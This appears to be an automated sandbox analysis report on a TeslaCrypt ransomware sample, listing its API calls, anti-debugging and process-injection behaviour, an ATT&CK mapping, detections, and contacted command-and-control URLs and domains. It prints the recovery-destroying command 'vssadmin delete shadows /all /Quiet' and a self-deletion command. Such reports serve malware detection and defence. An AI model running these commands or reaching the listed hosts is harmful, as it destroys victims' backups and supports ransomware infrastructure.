            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0041CBF0 GetVersionExW,LoadLibraryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,FindCloseChangeNotification,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,4_1_0041CBF0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042D27C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_0042D27C
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00412C10 mov eax, dword ptr fs:[00000030h]1_2_00412C10
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00412C10 mov eax, dword ptr fs:[00000030h]1_1_00412C10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00412C10 mov eax, dword ptr fs:[00000030h]4_1_00412C10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00412C10 mov eax, dword ptr fs:[00000030h]20_2_00412C10
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_1_00412C10 mov eax, dword ptr fs:[00000030h]20_1_00412C10
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042F826 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0042F826
            Source: C:\Users\user\Desktop\safecrypt.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004256D3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00426B68
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042B7C3 SetUnhandledExceptionFilter,1_2_0042B7C3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_004256D3
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_1_00426B68
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_0042B7C3 SetUnhandledExceptionFilter,1_1_0042B7C3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_004256D3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00426B68
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_0042B7C3 SetUnhandledExceptionFilter,4_1_0042B7C3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_004256D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_004256D3
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00426B68 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00426B68
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_0042B7C3 SetUnhandledExceptionFilter,20_2_0042B7C3

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Contains functionality to inject code into remote processesShow sources
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 0_2_02681828 VirtualFree,CreateProcessW,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,0_2_02681828
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\safecrypt.exeMemory written: C:\Users\user\Desktop\safecrypt.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMemory written: C:\Users\user\AppData\Roaming\mllvvvh.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMemory written: C:\Users\user\AppData\Roaming\mllvvvh.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMemory written: C:\Users\user\AppData\Roaming\mllvvvh.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041EB60 _memset,_memset,_memset,GetEnvironmentVariableW,_memset,ShellExecuteExW,ShellExecuteExW,GetLastError,Sleep,GetLastError,Sleep,ShellExecuteExW,CloseHandle,1_2_0041EB60
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Users\user\Desktop\safecrypt.exe 'C:\Users\user\Desktop\safecrypt.exe' Jump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXEJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe C:\Users\user\AppData\Roaming\mllvvvh.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Windows\System32\vssadmin.exe 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet Jump to behavior
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeProcess created: C:\Users\user\AppData\Roaming\mllvvvh.exe 'C:\Users\user\AppData\Roaming\mllvvvh.exe'
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041F3E0 CoInitializeEx,GdiplusStartup,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,_memset,GetVersionExW,CreateThread,_memset,__wfopen_s,_fprintf,GdipAlloc,GdipCreateBitmapFromHBITMAP,CreateThread,SetThreadPriority,WaitForSingleObject,_memset,GdipSaveImageToFile,1_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0042BCE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0042BCE5
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_0041F3E0 CoInitializeEx,GdiplusStartup,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,SHGetFolderPathW,SHGetFolderPathW,LoadLibraryW,LoadStringW,LoadStringW,LoadStringW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetSpecialFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,GetModuleFileNameW,DeleteFileW,LookupPrivilegeValueA,GetLastError,_memset,GetVersionExW,CreateThread,_memset,__wfopen_s,_fprintf,GdipAlloc,GdipCreateBitmapFromHBITMAP,CreateThread,SetThreadPriority,WaitForSingleObject,_memset,GdipSaveImageToFile,1_2_0041F3E0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsNative API4Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder111Application Shimming1Obfuscated Files or Information3LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationInhibit System Recovery1
            Domain AccountsAt (Linux)Logon Script (Windows)Access Token Manipulation1Software Packing22Security Account ManagerSystem Information Discovery14SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Process Injection211File Deletion1NTDSSecurity Software Discovery141Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder111Masquerading1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection211Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories2/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 375304 Sample: safecrypt.exe Startdate: 24/03/2021 Architecture: WINDOWS Score: 100 77 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus detection for URL or domain 2->81 83 7 other signatures 2->83 10 safecrypt.exe 2->10         started        13 mllvvvh.exe 2->13         started        15 mllvvvh.exe 2->15         started        17 mllvvvh.exe 2->17         started        process3 signatures4 95 Detected unpacking (changes PE section rights) 10->95 97 Detected unpacking (overwrites its own PE header) 10->97 99 Contains functionality to inject code into remote processes 10->99 19 safecrypt.exe 2 10->19         started        101 Injects a PE file into a foreign processes 13->101 23 mllvvvh.exe 13->23         started        25 mllvvvh.exe 15->25         started        27 mllvvvh.exe 17->27         started        process5 file6 61 C:\Users\user\AppData\Roaming\mllvvvh.exe, PE32 19->61 dropped 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->85 29 mllvvvh.exe 19->29         started        32 cmd.exe 1 19->32         started        signatures7 process8 signatures9 103 Multi AV Scanner detection for dropped file 29->103 105 Detected unpacking (changes PE section rights) 29->105 107 Detected unpacking (overwrites its own PE header) 29->107 109 5 other signatures 29->109 34 mllvvvh.exe 5 834 29->34         started        39 conhost.exe 32->39         started        process10 dnsIp11 71 educarpetas.com 185.53.178.54, 49709, 80 TEAMINTERNET-ASDE Germany 34->71 73 iicsdrd.com 52.60.87.163, 49710, 80 AMAZON-02US United States 34->73 75 4 other IPs or domains 34->75 63 C:\...\help_recover_instructions+fnc.txt, Unknown 34->63 dropped 65 C:\...\help_recover_instructions+fnc.txt, Unknown 34->65 dropped 67 C:\...\help_recover_instructions+fnc.txt, Unknown 34->67 dropped 69 8 other malicious files 34->69 dropped 87 May disable shadow drive data (uses vssadmin) 34->87 89 Creates files in the recycle bin to hide itself 34->89 91 Creates autostart registry keys with suspicious names 34->91 93 3 other signatures 34->93 41 bcdedit.exe 7 1 34->41         started        43 bcdedit.exe 7 1 34->43         started        45 vssadmin.exe 1 34->45         started        47 3 other processes 34->47 file12 signatures13 process14 process15 49 conhost.exe 41->49         started        51 conhost.exe 43->51         started        53 conhost.exe 45->53         started        55 conhost.exe 47->55         started        57 conhost.exe 47->57         started        59 conhost.exe 47->59         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            safecrypt.exe92%VirustotalBrowse
            safecrypt.exe74%MetadefenderBrowse
            safecrypt.exe96%ReversingLabsWin32.Ransomware.TeslaCrypt
            safecrypt.exe100%AviraHEUR/AGEN.1124982
            safecrypt.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\mllvvvh.exe74%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\mllvvvh.exe96%ReversingLabsWin32.Ransomware.TeslaCrypt

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            25.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            1.1.safecrypt.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            18.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            4.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            24.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            22.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            2.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            18.3.mllvvvh.exe.2900000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            20.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            24.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            0.2.safecrypt.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            23.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            4.1.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            1.2.safecrypt.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            0.3.safecrypt.exe.2910000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            22.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            25.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            20.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            1.0.safecrypt.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            2.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            0.0.safecrypt.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            23.1.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            18.0.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            24.3.mllvvvh.exe.2900000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            22.3.mllvvvh.exe.2930000.0.unpack100%AviraHEUR/AGEN.1124982Download File
            23.2.mllvvvh.exe.400000.0.unpack100%AviraHEUR/AGEN.1101649Download File
            2.3.mllvvvh.exe.27c0000.0.unpack100%AviraHEUR/AGEN.1124982Download File

            Domains

            SourceDetectionScannerLabelLink
            iicsdrd.com5%VirustotalBrowse
            educarpetas.com2%VirustotalBrowse
            bddadmin.desjardins.fr2%VirustotalBrowse
            southinstrument.org5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.php10%Avira URL Cloudsafe
            http://educarpetas.com/0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.php;0%Avira URL Cloudsafe
            http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.php0%Avira URL Cloudsafe
            http://pot98bza3sgfjr35t.fausttime.com/BC32439525276233100%Avira URL Cloudphishing
            http://pot98bza3sgfjr35t.fausttime.com/%S100%Avira URL Cloudphishing
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpo0%Avira URL Cloudsafe
            http://pot98bza3sgfjr35t.faustti0%Avira URL Cloudsafe
            http://h5534bvnrnkj345.maniupulp.com/%S0%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.php0%Avira URL Cloudsafe
            http://pot98bza3sgfjr35t.fausttime.com/%S2.100%Avira URL Cloudphishing
            http://southinstrument.org/templates/protostar/less/mzsys.phpG0%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phph0%Avira URL Cloudsafe
            http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.phpindows0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.php0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.phpj0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.phpFv0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.phpm0%Avira URL Cloudsafe
            http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.php;0%Avira URL Cloudsafe
            http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.php0%Avira URL Cloudsafe
            http://h5534bvnrnkj345.maniupulp.com/%S3.0%Avira URL Cloudsafe
            http://bddadmin.desjardins.fr/0%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/0%Avira URL Cloudsafe
            http://southinstrument.org/templates/protostar/less/mzsys.php0%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpParameters0%Avira URL Cloudsafe
            http://southinstrument.org/templates/protostar/less/mzsys.phpu0%Avira URL Cloudsafe
            http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIf0%Avira URL Cloudsafe
            http://iicsdrd.com/dows0%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.phpc0%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpK0%Avira URL Cloudsafe
            http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BC324395252762330%Avira URL Cloudsafe
            http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.phplp.com/BC324395252760%Avira URL Cloudsafe
            http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpE0%Avira URL Cloudsafe
            http://h5534bvnrnkj345.maniupulp.com/BC324395252762330%Avira URL Cloudsafe
            http://iicsdrd.com/tmp/mzsys.phpys.php0%Avira URL Cloudsafe
            http://southinstrument.org/0%Avira URL Cloudsafe
            http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S0%Avira URL Cloudsafe
            http://iicsdrd.com/0%Avira URL Cloudsafe
            http://h5534bvnrnkj345.ma0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            iicsdrd.com
            52.60.87.163
            truetrueunknown
            educarpetas.com
            185.53.178.54
            truetrueunknown
            bddadmin.desjardins.fr
            176.74.179.58
            truefalseunknown
            southinstrument.org
            unknown
            unknownfalseunknown
            dunyamuzelerimuzesi.com
            unknown
            unknownfalse
              unknown
              grant-pro.com
              unknown
              unknownfalse
                unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://iicsdrd.com/tmp/mzsys.phptrue
                • Avira URL Cloud: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.php1mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://educarpetas.com/mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://iicsdrd.com/tmp/mzsys.php;mllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.phpmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pot98bza3sgfjr35t.fausttime.com/BC32439525276233help_recover_instructions+fnc.html274.4.drtrue
                • Avira URL Cloud: phishing
                unknown
                http://pot98bza3sgfjr35t.fausttime.com/%Smllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmptrue
                • Avira URL Cloud: phishing
                unknown
                http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpomllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pot98bza3sgfjr35t.fausttisafecrypt.exe, 00000000.00000003.323290107.0000000002910000.00000004.00000001.sdmp, mllvvvh.exe, 00000002.00000003.328099442.00000000027C0000.00000004.00000001.sdmp, mllvvvh.exe, 00000012.00000003.351881255.0000000002900000.00000004.00000001.sdmp, mllvvvh.exe, 00000016.00000003.369476609.0000000002930000.00000004.00000001.sdmp, mllvvvh.exe, 00000018.00000003.386782639.0000000002900000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://h5534bvnrnkj345.maniupulp.com/%Smllvvvh.exe, 00000019.00000002.390167710.0000000000400000.00000040.00000001.sdmptrue
                • Avira URL Cloud: safe
                unknown
                http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pot98bza3sgfjr35t.fausttime.com/%S2.mllvvvh.exetrue
                • Avira URL Cloud: phishing
                unknown
                http://southinstrument.org/templates/protostar/less/mzsys.phpGmllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phphmllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://grant-pro.com/templates/beez3/html/com_newsfeeds/categories/mzsys.phpindowsmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://iicsdrd.com/tmp/mzsys.phpjmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://iicsdrd.com/tmp/mzsys.phpFvmllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://iicsdrd.com/tmp/mzsys.phpmmllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.php;mllvvvh.exe, 00000004.00000003.386389071.000000000074A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.phpmllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.383939672.0000000000727000.00000004.00000001.sdmp, mllvvvh.exe, 00000004.00000003.386414484.000000000075D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://h5534bvnrnkj345.maniupulp.com/%S3.mllvvvh.exefalse
                • Avira URL Cloud: safe
                unknown
                http://bddadmin.desjardins.fr/mllvvvh.exe, 00000004.00000003.383913160.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://dunyamuzelerimuzesi.com/mllvvvh.exe, 00000004.00000003.469343744.0000000000777000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://southinstrument.org/templates/protostar/less/mzsys.phpmllvvvh.exe, 00000004.00000003.383913160.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpParametersmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://southinstrument.org/templates/protostar/less/mzsys.phpumllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%SIfmllvvvh.exefalse
                • Avira URL Cloud: safe
                unknown
                http://www.torproject.org/projects/torbrowser.html.enhelp_recover_instructions+fnc.html274.4.drfalse
                  high
                  http://iicsdrd.com/dowsmllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://iicsdrd.com/tmp/mzsys.phpcmllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpKmllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/BC32439525276233help_recover_instructions+fnc.html274.4.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://bddadmin.desjardins.fr/js/openlayers/theme/default/img/mzsys.phplp.com/BC32439525276mllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://dunyamuzelerimuzesi.com/templates/yoo_bigeasy/styles/turquoise/mzsys.phpEmllvvvh.exe, 00000004.00000003.467466643.000000000075D000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://h5534bvnrnkj345.maniupulp.com/BC32439525276233help_recover_instructions+fnc.html274.4.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://iicsdrd.com/tmp/mzsys.phpys.phpmllvvvh.exe, 00000004.00000003.432672479.0000000000727000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://southinstrument.org/mllvvvh.exe, 00000004.00000003.411334300.0000000000704000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
